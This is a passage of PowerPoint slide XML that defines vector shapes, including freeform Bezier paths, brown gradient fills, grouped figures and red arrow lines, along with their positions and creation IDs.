                      <a:gd name="T30" fmla="*/ 32 w 226"/>
                      <a:gd name="T31" fmla="*/ 104 h 191"/>
                      <a:gd name="T32" fmla="*/ 38 w 226"/>
                      <a:gd name="T33" fmla="*/ 102 h 191"/>
                      <a:gd name="T34" fmla="*/ 39 w 226"/>
                      <a:gd name="T35" fmla="*/ 68 h 191"/>
                      <a:gd name="T36" fmla="*/ 36 w 226"/>
                      <a:gd name="T37" fmla="*/ 69 h 191"/>
                      <a:gd name="T38" fmla="*/ 39 w 226"/>
                      <a:gd name="T39" fmla="*/ 47 h 191"/>
                      <a:gd name="T40" fmla="*/ 38 w 226"/>
                      <a:gd name="T41" fmla="*/ 165 h 191"/>
                      <a:gd name="T42" fmla="*/ 47 w 226"/>
                      <a:gd name="T43" fmla="*/ 175 h 191"/>
                      <a:gd name="T44" fmla="*/ 98 w 226"/>
                      <a:gd name="T45" fmla="*/ 189 h 191"/>
                      <a:gd name="T46" fmla="*/ 125 w 226"/>
                      <a:gd name="T47" fmla="*/ 170 h 191"/>
                      <a:gd name="T48" fmla="*/ 125 w 226"/>
                      <a:gd name="T49" fmla="*/ 153 h 191"/>
                      <a:gd name="T50" fmla="*/ 125 w 226"/>
                      <a:gd name="T51" fmla="*/ 124 h 191"/>
                      <a:gd name="T52" fmla="*/ 123 w 226"/>
                      <a:gd name="T53" fmla="*/ 88 h 191"/>
                      <a:gd name="T54" fmla="*/ 121 w 226"/>
                      <a:gd name="T55" fmla="*/ 75 h 191"/>
                      <a:gd name="T56" fmla="*/ 121 w 226"/>
                      <a:gd name="T57" fmla="*/ 71 h 191"/>
                      <a:gd name="T58" fmla="*/ 121 w 226"/>
                      <a:gd name="T59" fmla="*/ 75 h 191"/>
                      <a:gd name="T60" fmla="*/ 123 w 226"/>
                      <a:gd name="T61" fmla="*/ 88 h 191"/>
                      <a:gd name="T62" fmla="*/ 128 w 226"/>
                      <a:gd name="T63" fmla="*/ 121 h 191"/>
                      <a:gd name="T64" fmla="*/ 129 w 226"/>
                      <a:gd name="T65" fmla="*/ 123 h 191"/>
                      <a:gd name="T66" fmla="*/ 129 w 226"/>
                      <a:gd name="T67" fmla="*/ 123 h 191"/>
                      <a:gd name="T68" fmla="*/ 129 w 226"/>
                      <a:gd name="T69" fmla="*/ 127 h 191"/>
                      <a:gd name="T70" fmla="*/ 137 w 226"/>
                      <a:gd name="T71" fmla="*/ 147 h 191"/>
                      <a:gd name="T72" fmla="*/ 151 w 226"/>
                      <a:gd name="T73" fmla="*/ 153 h 191"/>
                      <a:gd name="T74" fmla="*/ 199 w 226"/>
                      <a:gd name="T75" fmla="*/ 139 h 191"/>
                      <a:gd name="T76" fmla="*/ 186 w 226"/>
                      <a:gd name="T77" fmla="*/ 107 h 1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226" h="191">
                        <a:moveTo>
                          <a:pt x="186" y="107"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="184" y="108"/>
                          <a:pt x="175" y="110"/>
                          <a:pt x="164" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="84"/>
                          <a:pt x="155" y="57"/>
                          <a:pt x="154" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="32"/>
                          <a:pt x="136" y="27"/>
                          <a:pt x="128" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="21"/>
                          <a:pt x="98" y="16"/>
                          <a:pt x="85" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="9"/>
                          <a:pt x="54" y="3"/>
                          <a:pt x="45" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="0"/>
                          <a:pt x="18" y="4"/>
                          <a:pt x="15" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="14"/>
                          <a:pt x="8" y="50"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="98"/>
                          <a:pt x="3" y="104"/>
                          <a:pt x="8" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="108"/>
                          <a:pt x="17" y="107"/>
                          <a:pt x="23" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="104"/>
                          <a:pt x="31" y="104"/>
                          <a:pt x="32" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="103"/>
                          <a:pt x="36" y="103"/>
                          <a:pt x="38" y="102"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="68"/>
                          <a:pt x="37" y="69"/>
                          <a:pt x="36" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="54"/>
                          <a:pt x="39" y="44"/>
                          <a:pt x="39" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="53"/>
                          <a:pt x="38" y="122"/>
                          <a:pt x="38" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="170"/>
                          <a:pt x="41" y="175"/>
                          <a:pt x="47" y="175"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="59" y="178"/>
                          <a:pt x="91" y="188"/>
                          <a:pt x="98" y="189"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="106" y="191"/>
                          <a:pt x="122" y="181"/>
                          <a:pt x="125" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="168"/>
                          <a:pt x="125" y="155"/>
                          <a:pt x="125" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="111"/>
                          <a:pt x="124" y="99"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="82"/>
                          <a:pt x="122" y="78"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="79"/>
                          <a:pt x="123" y="83"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="96"/>
                          <a:pt x="126" y="107"/>
                          <a:pt x="128" y="121"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="137"/>
                          <a:pt x="134" y="143"/>
                          <a:pt x="137" y="147"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141" y="151"/>
                          <a:pt x="145" y="152"/>
                          <a:pt x="151" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="166" y="149"/>
                          <a:pt x="181" y="144"/>
                          <a:pt x="199" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="226" y="131"/>
                          <a:pt x="210" y="99"/>
                          <a:pt x="186" y="107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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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90" name="Freeform 2097">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD7B7F0-B64C-48C7-823C-1FB28247D8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 flipH="1">
                    <a:off x="3178" y="2486"/>
                    <a:ext cx="109" cy="66"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 27 w 60"/>
                      <a:gd name="T1" fmla="*/ 34 h 36"/>
                      <a:gd name="T2" fmla="*/ 9 w 60"/>
                      <a:gd name="T3" fmla="*/ 20 h 36"/>
                      <a:gd name="T4" fmla="*/ 14 w 60"/>
                      <a:gd name="T5" fmla="*/ 11 h 36"/>
                      <a:gd name="T6" fmla="*/ 48 w 60"/>
                      <a:gd name="T7" fmla="*/ 14 h 36"/>
                      <a:gd name="T8" fmla="*/ 51 w 60"/>
                      <a:gd name="T9" fmla="*/ 26 h 36"/>
                      <a:gd name="T10" fmla="*/ 27 w 60"/>
                      <a:gd name="T11" fmla="*/ 34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0" h="36">
                        <a:moveTo>
                          <a:pt x="27" y="34"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="33"/>
                          <a:pt x="0" y="22"/>
                          <a:pt x="9" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="19"/>
                          <a:pt x="12" y="13"/>
                          <a:pt x="14" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="8"/>
                          <a:pt x="48" y="0"/>
                          <a:pt x="48" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="18"/>
                          <a:pt x="43" y="22"/>
                          <a:pt x="51" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="29"/>
                          <a:pt x="41" y="36"/>
                          <a:pt x="27" y="3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91" name="Freeform 2098">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE3F1C2-9425-49DF-91E2-2DE37D7BF5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 flipH="1">
                    <a:off x="3150" y="2802"/>
                    <a:ext cx="165" cy="447"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 89 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 2 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 43 w 90"/>
                      <a:gd name="T17" fmla="*/ 205 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 40 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 43 w 90"/>
                      <a:gd name="T25" fmla="*/ 205 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="141"/>
                          <a:pt x="90" y="47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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="20"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="10"/>
                          <a:pt x="4" y="5"/>
                          <a:pt x="2" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="225"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="171"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="47"/>
                          <a:pt x="36" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="47"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="171"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="207"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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92" name="Oval 2099">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C55985-891B-49AA-9413-8BDC016079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gray">
                  <a:xfrm>
                    <a:off x="3159" y="2390"/>
                    <a:ext cx="145" cy="145"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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86" name="Group 2100">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5BC859-A44B-4793-91AA-FA719944914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58" y="1033"/>
                  <a:ext cx="129" cy="69"/>
                  <a:chOff x="3198" y="2487"/>
                  <a:chExt cx="181" cy="96"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2187" name="Freeform 2101">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C5BECE-9173-4F5A-A9F6-999D272519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3324" y="2499"/>
                    <a:ext cx="55" cy="43"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 12 w 28"/>
                      <a:gd name="T1" fmla="*/ 22 h 22"/>
                      <a:gd name="T2" fmla="*/ 12 w 28"/>
                      <a:gd name="T3" fmla="*/ 22 h 22"/>
                      <a:gd name="T4" fmla="*/ 21 w 28"/>
                      <a:gd name="T5" fmla="*/ 5 h 22"/>
                      <a:gd name="T6" fmla="*/ 0 w 28"/>
                      <a:gd name="T7" fmla="*/ 4 h 22"/>
                      <a:gd name="T8" fmla="*/ 12 w 28"/>
                      <a:gd name="T9" fmla="*/ 2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8" h="22">
                        <a:moveTo>
                          <a:pt x="12" y="22"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="22"/>
                          <a:pt x="12" y="22"/>
                          <a:pt x="12" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="28" y="13"/>
                          <a:pt x="21" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="0"/>
                          <a:pt x="4" y="3"/>
                          <a:pt x="0" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="4"/>
                          <a:pt x="10" y="15"/>
                          <a:pt x="12" y="22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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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88" name="Freeform 2102">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843FA974-C21C-4184-AE4C-E572F2BCDF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3198" y="2487"/>
                    <a:ext cx="150" cy="96"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 77 w 77"/>
                      <a:gd name="T1" fmla="*/ 28 h 49"/>
                      <a:gd name="T2" fmla="*/ 66 w 77"/>
                      <a:gd name="T3" fmla="*/ 11 h 49"/>
                      <a:gd name="T4" fmla="*/ 38 w 77"/>
                      <a:gd name="T5" fmla="*/ 1 h 49"/>
                      <a:gd name="T6" fmla="*/ 0 w 77"/>
                      <a:gd name="T7" fmla="*/ 38 h 49"/>
                      <a:gd name="T8" fmla="*/ 0 w 77"/>
                      <a:gd name="T9" fmla="*/ 38 h 49"/>
                      <a:gd name="T10" fmla="*/ 77 w 77"/>
                      <a:gd name="T11" fmla="*/ 28 h 49"/>
                      <a:gd name="T12" fmla="*/ 77 w 77"/>
                      <a:gd name="T13" fmla="*/ 28 h 49"/>
                      <a:gd name="T14" fmla="*/ 77 w 77"/>
                      <a:gd name="T15" fmla="*/ 28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7" h="49">
                        <a:moveTo>
                          <a:pt x="77" y="28"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="21"/>
                          <a:pt x="71" y="15"/>
                          <a:pt x="66" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="4"/>
                          <a:pt x="49" y="0"/>
                          <a:pt x="38" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="2"/>
                          <a:pt x="1" y="18"/>
                          <a:pt x="0" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="38"/>
                          <a:pt x="0" y="38"/>
                          <a:pt x="0" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="49"/>
                          <a:pt x="70" y="44"/>
                          <a:pt x="77" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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2087" name="Group 2086">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D2C568-6005-42C5-A3E4-D3937444EFBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7675990" y="1169543"/>
              <a:ext cx="574675" cy="392112"/>
              <a:chOff x="6835121" y="1269128"/>
              <a:chExt cx="574675" cy="392112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2173" name="Freeform 528">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0099647A-C357-4C20-BE29-AD6984C278E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835121" y="1269128"/>
                <a:ext cx="574675" cy="392112"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2261"/>
                  <a:gd name="T1" fmla="*/ 607 h 1545"/>
                  <a:gd name="T2" fmla="*/ 0 w 2261"/>
                  <a:gd name="T3" fmla="*/ 1545 h 1545"/>
                  <a:gd name="T4" fmla="*/ 2261 w 2261"/>
                  <a:gd name="T5" fmla="*/ 938 h 1545"/>
                  <a:gd name="T6" fmla="*/ 2261 w 2261"/>
                  <a:gd name="T7" fmla="*/ 0 h 1545"/>
                  <a:gd name="T8" fmla="*/ 0 w 2261"/>
                  <a:gd name="T9" fmla="*/ 607 h 1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61" h="1545">
                    <a:moveTo>
                      <a:pt x="0" y="607"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2261" y="938"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2261" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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174" name="Group 529">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B107266D-7331-451A-88AC-70F8AADBE4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92271" y="1351678"/>
                <a:ext cx="458788" cy="239712"/>
                <a:chOff x="786" y="1700"/>
                <a:chExt cx="1168" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2175" name="Line 530">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7613A771-D4DF-4E1C-A30B-31462EA3D9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786" y="2086"/>
                  <a:ext cx="140" cy="239"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="63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76" name="Line 531">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{261B8A15-7CC8-4552-B683-C5E1A868B1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926" y="2086"/>
                  <a:ext cx="88" cy="84"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="63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77" name="Line 532">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F2FA4C-9AB8-41EF-BBE1-EC78C82471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1014" y="2024"/>
                  <a:ext cx="70" cy="146"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="63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78" name="Line 533">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9B7674D-7892-4AB4-A658-D6F226F28C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1084" y="2024"/>
                  <a:ext cx="348" cy="62"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="63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79" name="Line 534">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B23C519B-C930-4E81-89E4-394D6223FC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1432" y="1878"/>
                  <a:ext cx="76" cy="208"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="63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80" name="Line 535">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E14C50-0B26-470B-A72C-3B39D58DDE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1508" y="1878"/>
                  <a:ext cx="172" cy="146"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="63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81" name="Line 536">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CEDB428-8A0F-478C-BE27-A1DA962C4A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1680" y="1700"/>
                  <a:ext cx="274" cy="324"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd type="triangl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88" name="Group 799">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702EDF3F-0405-4786-92BA-41FFA7CA85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2819" y="1957815"/>
              <a:ext cx="481012" cy="388938"/>
              <a:chOff x="2154" y="1819"/>
              <a:chExt cx="217" cy="176"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2145" name="Group 800">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{007A268A-6677-4FF6-8FD5-53918867B5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54" y="1862"/>
                <a:ext cx="217" cy="133"/>
                <a:chOff x="1977" y="2705"/>
                <a:chExt cx="897" cy="548"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2161" name="Freeform 801">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4927EEF-E1C9-4352-BC2F-40F94E9C6E8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977" y="2787"/>
                  <a:ext cx="45" cy="321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3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3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62" name="Freeform 802">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC9BBEE-1315-429B-A22E-CC617C49D9C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022" y="2787"/>
                  <a:ext cx="46" cy="321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3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3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63" name="Freeform 803">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
